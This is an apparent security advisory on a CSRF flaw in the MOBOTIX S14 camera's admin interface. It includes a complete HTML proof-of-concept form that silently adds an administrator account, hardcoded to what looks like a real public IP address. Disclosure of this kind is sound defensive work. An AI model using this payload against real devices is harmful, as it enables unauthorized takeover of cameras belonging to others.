MOBOTIX S14 Camera - MX-V4.2.1.61 - Lack of Cross-Site Request Forgery Countermeasures
Created May 29, 2019
Summary
The MOBOTIX S14 Camera (firmware MX-V4.2.1.61) does not implement any mechanism to prevent cross-site request forgery (CSRF) attacks against its administrative interface.
Impact
Successful exploitation can lead to takeover of the device: an attacker who lures an authenticated administrator to a page under the attacker's control can add a new administrator account or change an existing account's password.
Details
State-changing requests to the camera's admin interface, such as the POST to /admin/access used below, carry no anti-CSRF token and are not tied to the requesting origin in any way. Because the request is a plain form POST with no custom headers, a browser will submit it from any third-party page and attach whatever credentials it holds for the camera (a session cookie or cached HTTP authentication), so a local account's password can be changed, or a new account created, without the knowledge of the authenticated user.
PoC - the following PoC adds a user named 'test' with the password 'aaaaa'. Note that this user is placed in the 'admins' group and therefore has administrator privileges. The form also resubmits the existing accounts (indices 0 and 1), since the endpoint expects the full user list.
<html>
<body>
<!-- Target is the camera's admin user-management endpoint; the form is submitted with the victim's own credentials. -->
<form method="POST" action="http://82.71.22.180:8001/admin/access">
<!-- Existing accounts (indices 0 and 1) are resent alongside the new account. -->
<input type="hidden" name="user_name_0" value="admin"/>
<input type="hidden" name="user_group_0" value="admins"/>
<input type="hidden" name="user_passwd_a_0" value="***"/>
<input type="hidden" name="user_passwd_b_0" value="***"/>
<input type="hidden" name="user_name_1" value="rayspeed"/>
<input type="hidden" name="user_group_1" value="users"/>
<input type="hidden" name="user_passwd_a_1" value="***"/>
<input type="hidden" name="user_passwd_b_1" value="***"/>
<!-- New account: 'test' in the 'admins' group with password 'aaaaa'. -->
<input type="hidden" name="user_name_2" value="test"/>
<input type="hidden" name="user_group_2" value="admins"/>
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/>
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/>
<input type="hidden" name="sv_passwd_a" value=""/>
<input type="hidden" name="sv_passwd_b" value=""/>
<input type="hidden" name="save_config" value="Set"/>
<input type="submit" value="Submit">
</form>
</body>
</html>